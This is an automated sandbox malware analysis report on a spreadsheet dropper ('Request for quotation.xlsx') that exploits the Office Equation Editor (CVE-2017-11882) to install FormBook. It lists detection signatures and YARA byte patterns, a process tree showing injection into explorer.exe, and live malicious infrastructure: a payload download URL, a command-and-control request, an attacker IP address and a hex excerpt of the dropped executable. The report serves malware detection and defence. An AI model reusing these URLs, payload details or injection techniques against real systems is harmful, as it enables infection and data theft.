Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Request for quotation.xlsx

Overview

General Information

Sample Name:Request for quotation.xlsx
Analysis ID:321122
MD5:109bae1300099a20ad3df28d09095bf1
SHA1:dd2c886624df876a75389a5690cf55fd59a0b217
SHA256:1154f054c7344a07eed067053d6f3cfec18bc3aee5078e94c3a77bba3827bb06
Tags:FormbookVelvetSweatshopxlsx

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2268 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2412 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2924 cmdline: 'C:\Users\Public\vbc.exe' MD5: 221E46C09EB3440BEB5A2256211C3262)
      • vbc.exe (PID: 3024 cmdline: C:\Users\Public\vbc.exe MD5: 221E46C09EB3440BEB5A2256211C3262)
      • vbc.exe (PID: 3020 cmdline: C:\Users\Public\vbc.exe MD5: 221E46C09EB3440BEB5A2256211C3262)
      • vbc.exe (PID: 2948 cmdline: C:\Users\Public\vbc.exe MD5: 221E46C09EB3440BEB5A2256211C3262)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • cmd.exe (PID: 2232 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: AD7B9C14083B52BC532FBA5948342B98)
            • cmd.exe (PID: 2224 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    00000007.00000002.2278876000.00000000002C0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000007.00000002.2278876000.00000000002C0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 17 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      7.2.vbc.exe.400000.2.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        7.2.vbc.exe.400000.2.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        7.2.vbc.exe.400000.2.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17609:$sqlite3step: 68 34 1C 7B E1
        • 0x1771c:$sqlite3step: 68 34 1C 7B E1
        • 0x17638:$sqlite3text: 68 38 2A 90 C5
        • 0x1775d:$sqlite3text: 68 38 2A 90 C5
        • 0x1764b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17773:$sqlite3blob: 68 53 D8 7F 8C
        7.2.vbc.exe.400000.2.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          7.2.vbc.exe.400000.2.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2412, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2924
          Sigma detected: EQNEDT32.EXE connecting to internetShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 103.141.138.87, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2412, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2412, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe
          Sigma detected: Executables Started in Suspicious FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2412, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2924
          Sigma detected: Execution in Non-Executable FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2412, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2924
          Sigma detected: Suspicious Program Location Process StartsShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2412, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2924

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: http://thdyneverwalkachinese2loneinlifekthfnp.ydns.eu/chnsfrnd2/winlog.exeAvira URL Cloud: Label: malware
          Antivirus detection for dropped fileShow sources
          Source: C:\Users\Public\vbc.exeAvira: detection malicious, Label: TR/AD.Swotter.yiimo
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exeAvira: detection malicious, Label: TR/AD.Swotter.yiimo
          Multi AV Scanner detection for domain / URLShow sources
          Source: thdyneverwalkachinese2loneinlifekthfnp.ydns.euVirustotal: Detection: 7%Perma Link
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exeReversingLabs: Detection: 33%
          Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 33%
          Multi AV Scanner detection for submitted fileShow sources
          Source: Request for quotation.xlsxVirustotal: Detection: 33%Perma Link
          Source: Request for quotation.xlsxReversingLabs: Detection: 22%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2278876000.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2278791944.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2391163751.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2391208418.00000000001D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2249509307.0000000003419000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 7.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exeJoe Sandbox ML: detected
          Source: 7.2.vbc.exe.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exeJump to behavior
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A556E47 GetFileAttributesW,FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,9_2_4A556E47
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A552E73 FindFirstFileExW,GetLastError,FindClose,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,9_2_4A552E73
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A570202 FindFirstFileW,GetFullPathNameW,RemoveDirectoryW,RemoveDirectoryW,GetLastError,GetLastError,GetFileAttributesW,SetFileAttributesW,RemoveDirectoryW,GetLastError,9_2_4A570202
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A56BF0C FindFirstFileW,FindNextFileW,FindClose,9_2_4A56BF0C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A55BBA4 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,FindNextFileW,GetLastError,FindClose,9_2_4A55BBA4
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A570492 FindFirstFileW,FindFirstFileW,FindClose,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetLastError,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,FindNextFileW,FindClose,9_2_4A570492
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop edi7_2_0040E451
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4x nop then mov edi, edi9_2_4A55C02E
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4x nop then pop edi9_2_0008E451
          Source: global trafficDNS query: name: thdyneverwalkachinese2loneinlifekthfnp.ydns.eu
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 103.141.138.87:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 103.141.138.87:80
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 20 Nov 2020 10:27:54 GMTServer: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38Last-Modified: Thu, 19 Nov 2020 20:54:09 GMTETag: "eb000-5b47bede9f95e"Accept-Ranges: bytesContent-Length: 962560Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 47 db b6 5f 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 0b 00 00 2e 0c 00 00 80 02 00 00 00 00 00 ee 4c 0c 00 00 20 00 00 00 60 0c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 0f 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a0 4c 0c 00 4b 00 00 00 00 60 0c 00 b4 7d 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0e 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 2c 0c 00 00 20 00 00 00 2e 0c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b4 7d 02 00 00 60 0c 00 00 7e 02 00 00 30 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 0e 00 00 02 00 00 00 ae 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 4c 0c 00 00 00 00 00 48 00 00 00 02 00 05 00 d0 52 00 00 3c 40 00 00 03 00 00 00 f4 00 00 06 0c 93 00 00 89 b9 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 3f 00 00 00 01 00 00 11 02 28 01 00 00 0a 38 18 00 00 00 38 f0 ff ff ff fe 0c 00 00 45 01 00 00 00 05 00 00 00 38 00 00 00 00 2a 02 28 04 00 00 06 20 00 00 00 00 16 3a e0 ff ff ff 26 20 00 00 00 00 38 d5 ff ff ff 00 13 30 03 00 4d 00 00 00 02 00 00 11 20 01 00 00 00 fe 0e 01 00 38 00 00 00 00 fe 0c 01 00 45 02 00 00 00 22 00 00 00 05 00 00 00 38 1d 00 00 00 73 22 00 00 06 13 00 20 00 00 00 00 28 05 00 00 06 3a d8 ff ff ff 26 38 ce ff ff ff 2a 11 00 6f 19 00 00 06 38 f3 ff ff ff 00 00 00 13 30 03 00 b1 00 00 00 01 00 00 11 20 02 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 05 00 00 00 65 00 00 00 45 00 00 00 25 00 00 00 64 00 00 00 05 00 00 00 38 60 00 00 00 02 7b 01 00 00 04 28 07 00 00 06 20 00 00 00 00 28 05 00 00 06 3a c8 ff ff ff 26 38 be ff ff ff 03 39 3a 00 00 00 20 01 00 00 00 28 05 00 00 06 3a ad ff ff ff 26 20 01 00 00 00 38 a2 ff ff ff 02 7b 01 0
          Source: global trafficHTTP traffic detected: GET /ogg/?tB=RFlQYLrZdnT7pMnfFMeIQbGHDdniJp1JjixjIr26XgGQhDWG8PiH1Erj4JEp2RyyMZp0Iw==&mbC0J=WL3hLJ98 HTTP/1.1Host: www.segredosdocopywriting.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: global trafficHTTP traffic detected: GET /chnsfrnd2/winlog.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: thdyneverwalkachinese2loneinlifekthfnp.ydns.euConnection: Keep-Alive
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exeJump to behavior
          Source: global trafficHTTP traffic detected: GET /chnsfrnd2/winlog.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: thdyneverwalkachinese2loneinlifekthfnp.ydns.euConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /ogg/?tB=RFlQYLrZdnT7pMnfFMeIQbGHDdniJp1JjixjIr26XgGQhDWG8PiH1Erj4JEp2RyyMZp0Iw==&mbC0J=WL3hLJ98 HTTP/1.1Host: www.segredosdocopywriting.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: explorer.exe, 00000008.00000000.2257114814.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: unknownDNS traffic detected: queries for: thdyneverwalkachinese2loneinlifekthfnp.ydns.eu
          Source: explorer.exe, 00000008.00000000.2269940837.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://%s.com
          Source: explorer.exe, 00000008.00000000.2269940837.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
          Source: explorer.exe, 00000008.00000000.2258237917.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000008.00000000.2257114814.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000008.00000000.2257114814.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
          Source: vbc.exe, 00000004.00000002.2260895982.0000000007FF0000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2252341374.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000008.00000000.2258936880.0000000004F30000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000008.00000000.2258237917.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000008.00000000.2258237917.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000008.00000000.2269940837.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.com
          Source: vbc.exe, 00000004.00000002.2260895982.0000000007FF0000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2252341374.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000008.00000000.2258237917.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000008.00000000.2257114814.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000008.00000000.2258237917.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000008.00000000.2257114814.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000008.00000000.2265797693.000000000861C000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000008.00000000.2265797693.000000000861C000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000008.00000000.2257114814.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2278876000.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2278791944.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2391163751.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2391208418.00000000001D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2249509307.0000000003419000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 7.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2278876000.00000000002C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2278876000.00000000002C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
